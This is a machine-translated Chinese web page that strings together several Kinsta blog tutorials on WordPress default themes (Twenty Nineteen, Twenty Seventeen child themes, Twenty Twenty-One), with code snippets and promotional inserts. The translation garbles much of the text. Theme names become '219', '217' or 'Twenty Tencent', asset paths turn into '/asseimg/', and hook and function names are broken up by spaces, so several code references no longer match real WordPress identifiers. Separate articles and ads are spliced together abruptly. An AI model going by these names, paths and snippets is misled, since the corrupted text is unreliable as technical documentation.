如果我们严格地将 5.0 版本保持在 4.9.8 + Gutenberg,我们将会有一个在新代码方面既重要又不重要的版本。都是久经沙场的。在某些方面,5.0 实际上已经过时了,一些有远见的主机已经安装并激活了 Gutenberg 进行新的安装。
这意味着我们的服务器上已经运行了 WordPress 5.0:它只是 WordPress 4.9.8,核心是 Gutenberg。其实还没完,因为 WordPress 5.0 自带了一个额外的条目,就是全新的Twenty 19 默认主题。
Twenty Nineteen WordPress Theme
因此,让我们深入了解一下,看看有什么新内容。
- 关于古腾堡和二十一九
- 安装 219 个
- 二十十九的观感
- 古腾堡主题化:一个开发者的方法
关于古腾堡和 2019
有些人可能不喜欢古腾堡。此外,关于新编辑的争论还远未结束,但是想想古腾堡宣称的范围:
需要在这里大声喊出来。Kinsta 太神奇了,我用它做我的个人网站。支持是迅速和杰出的,他们的服务器是 WordPress 最快的。
这些自定义模块改变了用户、开发人员和主机与 WordPress 的交互方式,使构建丰富的网络内容更加容易和直观,使发布和工作大众化,无论技术能力如何。
这就是古腾堡的目标,2019 年将事情向前推进了一步,与古腾堡一起为古腾堡而建。这是一个最小的,字体驱动的博客主题,有一个单列布局,可以用来建立各种各样的网站,从个人博客到小型商业网站。
写 2019 年主要意味着我们正在写古腾堡。在 2019 年,古腾堡不仅允许用户创建丰富的内容,甚至可以在编辑器中建立他们的整个网站。据 Allan Cole 在博客上说,
Gutenberg 给予用户前所未有的自由来定制他们网站的布局和设计。为了完全实现他们的愿景,用户将需要新一代灵活的主题,以利用古腾堡提供的创作自由。考虑到这一点,WordPress 5.0 将推出一个全新的默认主题:2019 年
在 2019 主题中,Gutenberg 不仅仅是一个内容构建者,它还是一个网站构建者,WordPress 用户将被允许利用 blocks 构建他们的整个网站。如果你还不喜欢古腾堡,大多数流行的页面生成器插件也增加了对古腾堡的支持。
(建议阅读:二十二十主题介绍)
安装 219
2019 应该遵循新 WordPress 主要版本的发布计划。然而,WordPress 5.0 应该在 11 月 19 日发布,有可能 2019 的工作版本到那个时候还没有准备好。查看 WordPress 5.0 所有可能的发布日期。不管怎样,这个主题可以在 Github 上下载,并且会一直放在那里,直到它被合并到 core 中。
《2019》是基于《T2》和《古腾堡-首发-主题》《T4》的,里面加入了萨斯元素。一旦你得到了。zip 包,提取主题,并将主题文件夹上传/移动到开发安装的/wp-content/themes目录中。你也可以从你的 WordPress 仪表盘上传。
Uploading a new theme from the WordPress dashboard
Kinsta 客户端可以将它安装在他们的暂存环境中。如果你没有使用 Kinsta,你仍然可以在你的本地机器上安装它。
Twenty Nineteen successfully installed
2019 的外观和感觉
单列布局强调内容,最适合全宽块。该主题现在支持页脚侧边栏,并带有三个导航菜单:主菜单和社交链接菜单,两者都位于页面页眉,以及位于页脚的页脚菜单。
Site title, site description, and menus in Twenty Nineteen header
博客页面看起来像启用了特色图像的常规博客页面。单个帖子和页面最好地展示了当前版本的古腾堡作为网站建设者的潜力。
由于它完全基于古腾堡,2019 的功能主要取决于古腾堡的开发周期和块的可用性。我们可以添加小部件块、短代码块、图库、HTML 代码等等。然而,所有这些块远远不能覆盖我们所有的需求。但幸运的是,我们有几个插件允许我们向古腾堡添加新的块,如原子块、高级古腾堡和可堆叠。甚至有像古腾堡云这样的项目涌现出来。
如果你认为这个主题看起来太简单了,考虑一下《2019》仍然是一部正在制作的作品。我们不确定在 WordPress 5.0 发布时它是否会被合并到核心中,我们可以期待在未来的几年中会有一些补充和错误解决方案。此外,还有许多问题尚未解决,还有一些功能需要实现。现在 219 支持子菜单,但不支持自定义标题和视频标题。无论如何,我们可以期待在一段合理的时间内添加更多的功能。
如果你对主题的状态感兴趣,可以查看 Github 上的完整问题列表。
古腾堡的主题化:一个开发者的方法
开箱即用,Gutenberg 在主题中提供了对块样式的基本支持,主题开发者可以自由地用他们的自定义样式覆盖 Gutenberg 的默认样式。但是开发人员也可以完全省略自定义样式,决定完全依靠 Gutenberg 来设计网站正面的区块。
拥有一个看起来和感觉上都像结果内容的编辑器可以改善作者的写作体验,并让每个人都能对 UI 感到舒适。
无论如何,一些古腾堡的风格和表现特征需要主题明确地添加对它们的支持,这可以通过在触发[after_setup_theme](https://codex.wordpress.org/Plugin_API/Action_Reference/after_setup_theme)动作时调用functions.php文件中的[add_theme_support](https://wordpress.org/gutenberg/handbook/extensibility/theme-support/)来完成。下面是一个功能实现的示例:
function mytheme_setup() {
// Add support for Block Styles
add_theme_support( 'wp-block-styles' );
}
add_action( 'after_setup_theme', 'mytheme_setup' );
下面列出了这些古腾堡功能的精选,其中一些也受到 2019 的支持。你会在古腾堡手册中找到完整的特性列表。
添加对古腾堡块演示样式的支持
Gutenberg 团队的目标之一是建立一个灵活的主题风格系统,并尽可能接近“前端和编辑器之间的视觉对等”。目的是给用户一个准确的预览的内容,因为它会像在前台网站。
为了实现这个目标,团队必须将表示风格和结构风格分开。默认情况下,为了避免影响网站外观,前端不会加载外观样式。无论如何,新的主题可以利用古腾堡的表现风格,只需通过下面的注册就可以了(详见手册):
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
// Add support for Block Styles
add_theme_support( 'wp-block-styles' );
如你所料,Twenty 19 支持古腾堡的积木风格。单个帖子页面在前端看起来很像编辑帖子页面,唯一的区别是特色图像,它在桌面上显示为覆盖整个视窗的背景图像。下图显示了古腾堡在后端的行动。
Gutenberg WordPress editor in full-screen mode
这是同样的帖子。
A single post page in Twenty Nineteen
广泛和全面的对齐
古腾堡还提供了两个额外的对齐选项:宽和全角对齐,但是你可以选择宽或全角对齐,只要你的主题支持它们。如果是这样,古腾堡显示两个额外的对齐图标。
Wide and Full width alignment buttons in Gutenberg
下图为 2019 年对齐中心、宽和全幅图像。
Align center, Wide width, and Full-width compared
主题开发人员可以添加对宽对齐和全角对齐的支持,只需在函数文件中使用一条语句即可实现:
// Add support for full and wide align images
add_theme_support( 'align-wide' );
一旦我们添加了对宽对齐和全角对齐的支持,我们应该为另外两个 CSS 类 : alignfull和alignwide提供 CSS 声明。219 提供以下款式:
.entry-content > *.alignwide,
.entry-summary > *.alignwide {
margin-left: auto;
margin-right: auto;
}
@media only screen and (min-width: 768px) {
.entry-content > *.alignwide,
.entry-summary > *.alignwide {
margin-left: calc(1 * (100vw / 12));
margin-right: calc(1 * (100vw / 12));
max-width: calc(10 * (100vw / 12));
}
}
.entry-content > *.alignfull,
.entry-summary > *.alignfull {
margin-top: calc(2 * 1rem);
margin-right: 0;
margin-bottom: calc(2 * 1rem);
margin-left: 0;
max-width: 100%;
}
.entry-content .wp-block-image.alignfull img {
width: 100vw;
margin-left: auto;
margin-right: auto;
}
注意:使用这个选项时要小心,因为如果你切换主题,它可能会导致问题(在 Github 上阅读关于这个主题的更多信息)。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
编辑风格
编辑器样式是 WordPress 3.0 引入的一个特性,允许主题开发者添加自定义样式到 TinyMCE 编辑器中。Gutenberg 也支持这一特性,但它的工作方式与经典编辑器不同,后者将样式直接加载到编辑器的 iframe 中。Gutenberg 添加了特定的 CSS 选择器,因为它不使用 iframe。
我们可以添加对编辑器样式的支持,如下所示:
// Add support for editor styles
add_theme_support( 'editor-styles' );
// Enqueue editor styles
add_editor_style( 'style-editor.css' );
这个功能也是 Twenty 支持的。你可以在 Gutenberg 的编辑器风格中更深入地研究这个主题。
块调色板
Gutenberg 在编辑器的颜色设置面板中提供了一个通用的颜色选择器。主题开发人员可以通过添加自定义调色板来增强这个工具,让用户可以快速选择块背景和文本的正确颜色。这是一个两步过程:
首先,我们必须提供一组颜色:
add_theme_support( 'editor-color-palette', array(
array(
'name' => __( 'hot pink', 'themeLangDomain' ),
'slug' => 'hot-pink',
'color' => '#f865b0',
),
array(
'name' => __( 'classic rose', 'themeLangDomain' ),
'slug' => 'classic-rose',
'color' => '#fbcaef',
),
) );
然后我们必须在主题的样式表中声明相应的样式:
.has-hot-pink-background-color {
background-color: #f865b0;
}
.has-hot-pink-color {
color: #f865b0;
}
类名以has-开头,后面是烤肉串情况下的颜色 slug,最后是上下文,可以是color或background-color。目前,二十十九不支持块调色板,但我们可以很容易地用一个子主题来改变这一点。
A custom color palette in Gutenberg
相反,如果您想要禁用自定义调色板,您必须将下面一行添加到您的主题或子主题的函数文件中:
add_theme_support( 'disable-custom-colors' );
阻止字体大小
主题也可以覆盖 Gutenberg 的默认字体大小。下面是您应该添加到函数文件中的代码示例:
add_theme_support( 'editor-font-sizes', array(
array(
'name' => __( 'extra-small', 'themeLangDomain' ),
'shortName' => __( 'XS', 'themeLangDomain' ),
'size' => 10,
'slug' => 'extra-small'
),
array(
'name' => __( 'small', 'themeLangDomain' ),
'shortName' => __( 'S', 'themeLangDomain' ),
'size' => 12,
'slug' => 'small'
),
array(
'name' => __( 'regular', 'themeLangDomain' ),
'shortName' => __( 'M', 'themeLangDomain' ),
'size' => 16,
'slug' => 'regular'
),
array(
'name' => __( 'large', 'themeLangDomain' ),
'shortName' => __( 'L', 'themeLangDomain' ),
'size' => 26,
'slug' => 'large'
),
array(
'name' => __( 'larger', 'themeLangDomain' ),
'shortName' => __( 'XL', 'themeLangDomain' ),
'size' => 36,
'slug' => 'larger'
),
array(
'name' => __( 'huge', 'themeLangDomain' ),
'shortName' => __( 'XXL', 'themeLangDomain' ),
'size' => 56,
'slug' => 'huge'
)
) );
新的字体大小将被添加到 Gutenberg 的文本设置中的字体大小选择器中。
Custom font sizes in Gutenberg
接下来,我们必须在主题的样式表中声明相应的样式。类名应该以has-开头,后面是 kebab 情况下的字体大小名称,以-font-size结尾。
.has-huge-font-size {
font-size: 56px;
}
219 不提供具体的字体大小,依赖于古腾堡的默认值。
注意:请记住,为了让所有这些代码工作,您应该通过after_setup_theme动作来挂钩它。
摘要
219 可以很好地用于个人博客,你可以把它想象成一块白色的画布,而不是一个功能齐全的 WordPress 主题。当涉及到建立商业和电子商务网站时,这种最小化的方法可能会有点限制,但不要担心:新的功能应该很快就会实现,我们很快就会看到更强大的 2019 版本。
同时,你也可以看看一些已经支持古腾堡的主题。原子块、 GeneratePress 、 Gutentype 和 Divi 仅举几个例子,但许多其他的应该很快就会出现。随着 WordPress 5.0 的快速到来,支持 Gutenberg 不是一个选项,主题开发者应该尽快接受新的 WordPress 编辑器,以保持在竞争中的领先地位。
有没有安装二十一九或者任何支持古腾堡的主题?我们希望在下面的评论中听到你的想法。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
一个开发者对 2017 主题的介绍
随着 WordPress 4.7 的发布,还出现了新的Twenty thicken 主题。新的默认主题比所有的前辈都更加易于用户和开发者定制,易于使用,非常适合个人和专业用途。此外,当谈到网站性能时,它是非常棒的,正如 Brian 在中解释的如何用 WordPress 在 Google PageSpeed Insights 中获得 100/100 分。
我们回顾了最新的默认主题 2019。如果你对新内容感到好奇,看看我们的深度分析:2019 主题介绍(古腾堡主题)
2017 主题为新的令人惊叹的 WordPress 功能提供了完美的服装,如可定制的视频标题。此外,它还提供了特定于主题的特性,比如首页部分、 SVG 图标支持、定制器中的可视编辑图标。
(建议阅读:二十二十主题介绍)
已经有很多关于 Twenty 主题的文章了,所以在这篇文章中,我不会列出它的新的很酷的特性和功能。相反,我将提出五个小教程,旨在帮助开发者和高级用户从新的 WordPress 默认主题中获得最大收益。借助儿童主题,我们将:
增强 217 个主题功能的子主题
我假设你熟悉 WordPress 子主题。如果你需要复习,花点时间阅读我们的 WordPress 儿童主题——入门指南。完成后,在 /wp-content/themes/ 目录下创建一个新文件夹,用一个唯一的可识别的名字命名,比如twenty tensey-child。在这个文件夹中,创建下面的 style.css :
/*
Theme Name: Twenty Seventeen Child
Theme URI: http://example.com/
Description: Twenty Seventeen Child Theme
Author: Your Name
Author URI: http://example.com
Template: twentyseventeen
Version: 1.0.0
License: GNU General Public License v2 or later
License URI: http://www.gnu.org/licenses/gpl-2.0.html
Tags: light, dark, two-columns, right-sidebar, responsive-layout, accessibility-ready
Text Domain: twentyseventeen-child
*/
样式表标题以注释的形式提供了所需的关于主题的细节。不需要额外的标签,我们也不会在示例中添加自定义样式声明。接下来,我们必须将父样式表和子样式表都放入队列。让我们将下面的函数添加到子主题的functions.php文件中:
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
function childtheme_enqueue_styles() {
wp_enqueue_style( 'parent-style',
get_template_directory_uri() . '/style.css' );
wp_enqueue_style( 'child-style',
get_stylesheet_directory_uri() . '/style.css',
array( 'parent-style' ),
wp_get_theme()->get('Version')
);
}
add_action( 'wp_enqueue_scripts', 'childtheme_enqueue_styles' );
让我们激活儿童主题,并开始定制二十十七。
自定义首页页眉
2017 主题最吸引人的特征之一是首页的全屏标题。在 Customizer Header Media 部分,您可以设置一个或多个背景图像,或者一个背景视频。
由于有了Twenty Seventeen _ custom _ header _ args过滤器,twenty seven 允许从子主题的functions.php文件定制标题。通过这个过滤器,我们可以向回调函数传递以下参数的数组:
- default-image ' ( 字符串)背景图片 URL
- default_text_color ' ( 字符串)页眉文本的颜色;
- 宽度 ' ( 整数)表头宽度(默认为 2000);
- 高度 ' ( 整数)表头高度(默认为 1200);
- flex-height'(bool)伸缩支持割台高度(默认为true);
- 视频 ' ( 布尔)视频支持(默认为真);
- WP-head-Callback'(string)回调函数,用于对博客中的标题图片和文本进行样式化(默认值为twenty seven _ header _ style
例如,让我们将以下代码添加到函数文件中:
function my_custom_header_args( $args ) {
$args['default-image'] = get_theme_file_uri( '/asseimg/header.jpg' );
return $args;
}
add_filter( 'twentyseventeen_custom_header_args', 'my_custom_header_args' );
在 WordPress 4.7 中已经引入了 get_theme_file_uri 函数,它在儿童主题开发中帮助了我们很多。该函数首先在子主题中搜索指定的文件,如果没有找到文件,则返回到父主题。
注意:要使用 get_theme_file_uri 及其配套函数 get_theme_file_path ,子主题应该尊重父主题的文件结构。
设置自定标题视频控制
标题视频是 WordPress 的核心功能,由于 WordPressheader _ video _ settings过滤器,它被 Twenty 修改。我们可以再次修改这些设置,通过相同的过滤器返回自定义的设置列表。让我们将下面的代码添加到子主题的 functions.php中:
function childtheme_setup() {
remove_filter( 'header_video_settings', 'twentyseventeen_video_controls' );
}
add_action( 'after_setup_theme', 'childtheme_setup' );
function childtheme_video_controls( $settings ) {
$settings['l10n']['play'] = __( 'Play', 'twentyseventeen-child' );
$settings['l10n']['pause'] = __( 'Pause', 'twentyseventeen-child' );
return $settings;
}
add_filter( 'header_video_settings', 'childtheme_video_controls' );
首先,我们移除了附属于 header_video_settings 滤镜的twenty twenty 17 _ video _ controls函数。然后,我们添加了自定义视频控件。在这个例子中,我们只使用了两个词,但是你明白了:你可以使用这个过滤器用你的自定义图形替换默认图标。
向首页添加更多部分
217 提供了一个分成几个部分的静态首页。每个部分的内容来自一个静态页面,上面是一个全屏图像(每个页面的特色图像)。
Front page sections can be configured in the Customizer Theme Options panel
默认情况下,Twenty Seventeen 最多允许四个部分,但是由于有了Twenty seven _ front _ page _ sections过滤器,我们可以添加任意数量的部分。作为一个例子,让我们在子主题的 functions.php 文件中添加下面一行:
add_filter( 'twentyseventeen_front_page_sections', function(){ return 6; } );
下图显示了新的定制器主题选项面板。
An enhanced version of the Theme Options panel
添加更多 SVG
对 SVG 图形的支持是 Twenty Tencent 最有趣的特性之一。主题提供了大量的 SVG 图标,分组在/asseimg/SVG-icons . SVGsprite 文件中。我们可以在页脚的社会链接菜单中欣赏 SVG。得益于 get_theme_file_path 核心功能和twenty twenty seven _ social _ links _ icons过滤器,我们可以替换这些图标或添加我们的自定义社交图标。
Twenty Seventeen footer
假设您想要添加一个链接到您令人惊叹的 Kickstarter 项目页面,但是 Twenty 没有提供相应的 SVG 图标。首先,你需要一个定制的 SVG sprite 文件,如下所示:
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
<svg style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink">
<defs>
<symbol id="icon-kickstarter" viewBox="0 0 16 16">
<path d="M6.406 5.453L9.34 1.2C9.895.4 10.61 0 11.49 0c.715 0 1.335.254 1.86.762.522.51.784 1.117.784 1.826 0 .523-.138.986-.416 1.386L11.073 7.82l3.235 4.102c.323.408.485.886.485 1.433 0 .724-.254 1.345-.763 1.865-.508.52-1.124.78-1.848.78-.793 0-1.398-.258-1.814-.774l-3.962-4.944v2.726c0 .778-.135 1.383-.405 1.814C5.51 15.607 4.8 16 3.86 16c-.855 0-1.518-.29-1.987-.866-.44-.532-.66-1.237-.66-2.114V2.91c0-.83.224-1.516.67-2.055C2.348.285 2.995 0 3.82 0c.786 0 1.44.285 1.964.855.292.316.477.635.554.96.047.2.07.572.07 1.12v2.518z"/>
</symbol>
</defs>
</svg>
符号元素的 id 属性标识社交图标,其值将在我们的代码中稍后使用。
现在我们必须把新的 SVG sprite 从子主题的函数文件中包含到页面中:
function childtheme_include_svg_icons() {
// Define SVG sprite file.
$custom_svg_icons = get_theme_file_path( '/asseimg/svg-custom-icons.svg' );
// If it exists, include it.
if ( file_exists( $custom_svg_icons ) ) {
require_once( $custom_svg_icons );
}
}
add_action( 'wp_footer', 'childtheme_include_svg_icons', 99999 );
这个函数很像二十十七的【functions.php】文件中定义的对应二十十七 _include_svg_icons 函数。主要区别在于,在我们的自定义函数中,我们使用 get_theme_file_path 来获取子主题的 SVG 文件。
最后,我们可以将 Kickstarter 图标添加到受支持的社交链接图标列表中:
function childtheme_social_links_icons( $social_links_icons ) {
$social_links_icons['kickstarter.com'] = 'kickstarter';
return $social_links_icons;
}
add_filter( 'twentyseventeen_social_links_icons', 'childtheme_social_links_icons' );
将 Kickstarter 项目添加到社交链接菜单,并跳转到页面页脚来欣赏我们的工作成果。
A customized Social Links menu
构建一个可滚动的单页网站
即使 2017 主题提供了一个多部分的首页,动画滚动也不是一个特色。该主题使用 jQuery ScrollTo 插件来创建动画滚动效果。不幸的是,只有当用户点击向下导航箭头时,动画才会被激活,并且不能用于菜单项。但是我们是开发者,我们可以给 217 人更多的权力。因此,在最后一个例子中,我们将扩展动画滚动功能,以便网站管理员可以构建一个动画的单页网站。
When the user clicks on the arrow icon in the navigation menu, the front page scrolls down to the first page section
在 2017 主题中,动画效果由位于 /assets/js/ 文件夹中的 global.js 文件控制。因此,我们的第一个任务是将 global.js 从其原始位置复制并粘贴到子主题的相应文件夹中。
The file structure of the child theme
现在我们可以开始编码了。为了完成这一最终任务,我们将
- 强制 WordPress 加载子主题的 global.js 文件,而不是原始的父主题文件,
- 向菜单链接添加特定的 CSS 类,
- 在首页的每个部分添加一个 ID,
- 修改 global.js 文件以获得动画效果。
1.强制 WordPress 加载子主题的 global.js 文件
让我们将第一个示例中定义的child theme _ enqueue _ styles函数修改如下:
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
function childtheme_enqueue_styles() {
wp_enqueue_style( 'parent-style', get_template_directory_uri() . '/style.css' );
wp_enqueue_style( 'child-style',
get_stylesheet_directory_uri() . '/style.css',
array( 'parent-style' ),
wp_get_theme()->get('Version')
);
if( is_front_page() ){
wp_enqueue_script( 'twentyseventeen-global', get_theme_file_uri( '/assets/js/global.js' ), array( 'jquery' ), '1.0', true );
}
}
add_action( 'wp_enqueue_scripts', 'childtheme_enqueue_styles' );
如果当前页面是首页,WordPress 会将子主题的 global.js 文件加入队列。如果不存在,WordPress 加载父节点的 global.js 。
2.向菜单链接添加 CSS 类
为了给菜单添加一个 CSS 类一个元素,我们可以使用的导航 _ 菜单 _ 链接 _ 属性过滤器。在 functions.php 中添加以下代码:
function childtheme_theme_menu_class($atts, $item, $args) {
if( is_array( $atts ) ) {
$atts['class'] = 'nav-menu-scroll-down';
}
return $atts;
}
add_filter('nav_menu_link_attributes','childtheme_theme_menu_class', 0,3);
菜单项标记将发生如下变化:
<li id="menu-item-96" class="sections menu-item menu-item-type-custom menu-item-object-custom menu-item-96">
<a href="/kinsta/#section-1" class="nav-menu-scroll-down">Section 1</a>
</li>
现在,我们可以很容易地从脚本中选择任何菜单链接。
3.将 id 添加到首页部分
为了使页面可滚动,我们必须通过为每个部分提供一个 id 属性来创建菜单链接目标。将 /template-parts/page/ 中的【content-front-page-panels.php】文件复制粘贴到同一个子主题的文件夹中。然后转到第 30 行,将其更改如下:
<div class="panel-content" id="<?php echo get_post()->post_name; ?>">
现在首页部分有了 id,允许我们从导航菜单中定位它们。以下是部分包装器的新标记:
<div class="panel-content" id="section-1">...</div>
请注意, id 属性的值将是 post slug。
The image shows the URL of a menu link
4.修改 global.js 文件
现在让我们打开子主题的 global.js 文件,并声明以下变量:
$navMenuScrollDown = $body.find( '.nav-menu-scroll-down' ),
跳到第 213 行,添加以下代码:
$navMenuScrollDown.click( function( e ) {
// grab target URL
var url = $(this).attr("href");
// get # position
var index = url.indexOf("#");
if(index == -1){
return;
}
// extract the target id value
var targetId = url.substring(index);
e.preventDefault();
// remove classes from any menu list items
$("a[href*='#']").parent().removeClass("current-menu-item current_page_item");
// add classes to current menu item
$(this).closest("li").addClass("current-menu-item current_page_item");
// scroll down
$( window ).scrollTo( targetId, {
duration: 800,
offset: { top: menuTop - navigationOuterHeight }
});
});
在这个函数中,我们检查 URL 是否包含一个英镑字符。如果没有,函数返回。接下来,我们获取目标部分 id,防止默认行为,并处理 CSS 类。最后, scrollTo 方法将视口移动到目标部分。
2021:深入探究新的默认主题
221 是 WordPress 5.6 中新的默认主题。如果你正在等待一个功能齐全的主题,你可能会有点失望。
Twenty Twenty One 是一个极简主义的主题,看起来像一个高度可定制的空白画布。像它的前辈一样,新的默认主题将主要依靠块编辑器来构建页面。
在这篇文章中,我们将介绍 Twenty Twenty-21 主题最有趣的特性,我们将向你展示如何用一个简单的 Twenty-21 子主题定制 WordPress 网站的外观和感觉。
准备好了吗?让我们开始吧!
Twenty Twenty-One theme preview (Image source: Make WordPress Core)
221 WordPress 主题初探
像 Twenty Twenty 一样,WordPress 5.6 的新默认主题不是从零开始构建的,而是基于来自社区的主题。
Twenty Twenty 1 是在一个新的 Automattic 主题的基础上开发的,即 Seedlet 主题,它提供了一个整洁有序的嵌套 CSS 自定义属性结构。由于在主题的样式表中大量使用了 CSS 属性,在 Twenty Twenty 1 上构建子主题既快速又简单。
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
Seedlet WordPress theme
Twenty Twenty One 是一个高度可访问的极简 WordPress 主题,有一个单列布局、一个页脚侧边栏和两个菜单位置:主导航和页脚导航。
- 首先,使用系统字体堆栈有利于 UX 和性能,因为大多数操作系统已经支持原生字体,并且不需要额外的加载时间。
- 第二,它们看起来是中性的,所以可以平滑地融合到任何一种设计中。
- 第三,由于它们不需要加载额外的字体文件,用户和开发者可以更容易地使用 Twenty Twenty One 定制网站的布局。
Twenty Twenty One 主题使用基于淡绿背景色和两种灰色作为前景色的最小调色板。该主题提供了几个额外的彩色调色板。
关于这一点,默认主题设计主管 Mel Choyse-Dwan 解释道:
我们将捆绑一些额外的调色板的主题,包括白色和黑色的配色方案。为什么是淡绿色?柔和的颜色现在很流行
Twenty Twenty-One colors (Image source: Make WordPress Core)
二十二十一是 WordPress 5.6 中新的 WordPress 默认主题!👁🗨在这个深入的指南中学习它的所有关键功能! 点击推文
如何安装 221
在写这篇文章的时候,Twenty Twenty 1 正在开发中,还不能在 WordPress 主题目录中下载。但是你可以在 Github 上下载这个主题的正在进行的版本。
一旦主题合并到核心中,Github 储存库将被弃用,你会在主题目录中找到它。由于 221 遵循 WordPress 5.6 发布时间表,你可能想要保存以下日期:
- 2020 年 10 月 20 日:Beta 1
- 2020 年 10 月 27 日:Beta 2
- 2020 年 11 月 2 日:Beta 3
- 2020 年 11 月 12 日:Beta 4
- 2020 年 11 月 17 日:RC 1
- 2020 年 12 月 1 日:RC 2
- 2020 年 12 月 7 日:WordPress 5.6 发布的试运行
- 2020 年 12 月 8 日:WordPress 5.6 发布的目标日期
要启动并运行 Twenty 221 主题,请遵循以下步骤:
- 从 GitHub 获取压缩包。
- 从 WordPress 仪表盘或通过 SFTP 将你的包上传到你的开发安装中。
- 浏览到外观→主题,点击主题预览图像上的激活按钮。
- 进入外观→定制配置二十二十一。
你现在可以开始在一个临时网站或者你的本地环境上运行你的测试。
重要的
请注意,Twenty Twenty One 仍在积极开发中,许多问题尚未修复,一些功能可能会在未来发生变化。
Twenty Twenty-One Issue #620 on Github
还没准备好进行测试吗?
别担心,我们已经剖析了这个主题,我们将向你展示 2021 年你能期待什么。
221 的主题和街区特色
就像 Twenty Twenty 一样,新的默认 WordPress 主题不是一个全功能的主题,而是一个极简主义的主题,依赖于块编辑器进行页面构建。该主题还旨在提供更好的可访问性。用梅尔·乔斯·德万的话说:
最后,我们很乐意使主题符合 WCAG 2.1 AAA 级的相关准则。当+make . WordPress . org/accessibility/提出这个想法时,我们很高兴,并希望我们社区的所有专家能提供指导,帮助我们实现这个想法。
主题特色:
块特征:
- 默认块样式
- 编辑器样式
- 深色编辑器样式(深色背景)
- 宽对齐
- 阻止字体大小
- 块调色板
- 块渐变预设
- 起始内容
- 响应嵌入
- 自定义行高
- 实验链接颜色
- 实验自定义间距
- 自定义单位(在 WordPress 5.6 中删除)
下面的列表包括了基于 Twenty Twenty One 构建网站时可能更相关的特性。
导航菜单
221 支持两个菜单位置,位于页眉右上角的主导航和页脚导航。
Twenty Twenty-One menu locations
如果添加到页脚菜单中,社交链接会被自动检测并转换为支持社交媒体的 SVG 图标。
Twenty Twenty-One social menu
帖子格式
221 支持九种帖子格式:链接、旁白、图库、图片、引用、状态、视频、音频、聊天。您可以在编辑器设置的状态&可见性面板中选择您的帖子格式。
Twenty Twenty-One supports nine post formats
要查看 Twenty Twenty One 主题如何处理帖子格式,导航到template-parts/extract文件夹并选择模板。比如在你喜欢的代码编辑器中打开【excerpt-image.php】的文件。在该文件中,您将看到以下代码:
/**
* Show the appropriate content for the Image post format.
*
* @link https://developer.wordpress.org/themes/basics/template-hierarchy/
*
* @package WordPress
* @subpackage Twenty_Twenty_One
* @since 1.0.0
*/
// If there is no featured-image, print the first image block found.
if (
! twenty_twenty_one_can_show_post_thumbnail() &&
has_block( 'core/image', get_the_content() )
) {
twenty_twenty_one_print_first_instance_of_block( 'core/image', get_the_content() );
}
the_excerpt();
代码是不言自明的,但是让我们仔细看看:
has_block确定一个帖子或一个字符串是否包含一个特定的块类型(本例中为核心图像块)。twenty_twenty_one_print_first_instance_of_block是一个 Twenty Twenty-One 模板函数,它打印内容中块的第一个实例,然后分离。
因此,如果一个网站的浏览者需要一个“图片”格式的文章档案,WordPress 会在档案中的每个文章的顶部显示一个图片。按照同样的逻辑,您可以通过检查相应的模板部分来研究任何帖子格式。
网站标识和自定义徽标
Twenty 21 支持 300×100 像素的自定义徽标。您可以在站点标识面板中找到自定义徽标设置。
Site Identity in Twenty Twenty-One
该屏幕包括:
- 自定义徽标
- 网站标题
- 品牌理念;标签行
- 网站图标
编辑器字体大小
221 支持以下字体大小:
- 超小号–16
- 小型–18
- 正常/中等–20
- 大–24
- 特大号–40
- 巨大–96
- 巨大–144
在主题的样式表中,大小以rem为单位设置。
Twenty Twenty-One supports seven font sizes
颜色设置
主题定制器提供了一个颜色&黑暗模式面板,包括两个选项:
- 一个简单的颜色选择器,有 10 个预定义的调色板。
- 打开/关闭黑暗模式的复选框。
下图显示了带有深灰色文本的浅黄色背景色。
Colors & Dark Mode settings in Twenty Twenty-One
背景颜色默认为淡绿色('#d1e4dd'),但是网站管理员可以很容易地在以下背景颜色之间切换:
- black =
'#000000'; - 深灰=
'#28303D'; - gray =
'#39414D'; - green =
'#D1E4DD'; - blue =
'#D1DFE4'; - 紫色=
'#D1D1E4'; - red =
'#E4D1D1'; - 橙色=
'#E4DAD1'; - 黄色=
'#EEEADD'; - white =
'#FFFFFF';
在编辑器的块设置中,与块调色板相同的颜色可用。
此外,Twenty Twenty One 支持几个渐变预置用于支持此功能的区块。下图显示了列块设置中的默认渐变。
Eight gradient presets in a block’s Color settings
从可访问性的角度来看,对于默认主题来说,黑暗模式支持绝对是一个新奇的事物。
让我们再深入一点!
221 主题中的黑暗模式支持
在关于#核心主题松弛频道的讨论之后,梅尔·乔伊斯-德万为 2021 引入了黑暗模式支持。
Enabling dark mode in macOS
起初,不清楚这个特性是作为一个主题特性还是作为一个独立的项目发布在一个插件中,如何在 Twenty Twenty-One 中实现。
有五个可能的选项可供选择:
- 允许站点所有者禁用黑暗模式支持,并允许站点访问者在查看站点时打开/关闭黑暗模式。
- 仅允许网站所有者禁用黑暗模式支持(网站访问者没有打开/关闭黑暗模式的选项)。
- 启用“始终开启”的黑暗模式支持,同时允许站点访问者在查看站点时切换它。
- 将黑暗模式支持启用为“始终开启”,并防止网站访问者打开/关闭黑暗模式。
- 完全不支持黑暗模式
经过深思熟虑的讨论,主题中加入了黑暗模式。现在:
- 黑暗模式支持是网站所有者的一项可选功能。
- 切换按钮已从编辑器界面中移除,仅在定制器中可用。
- 黑暗模式切换按钮位于右下角(RTL 的左边),当站点查看器向下滚动页面时会消失。
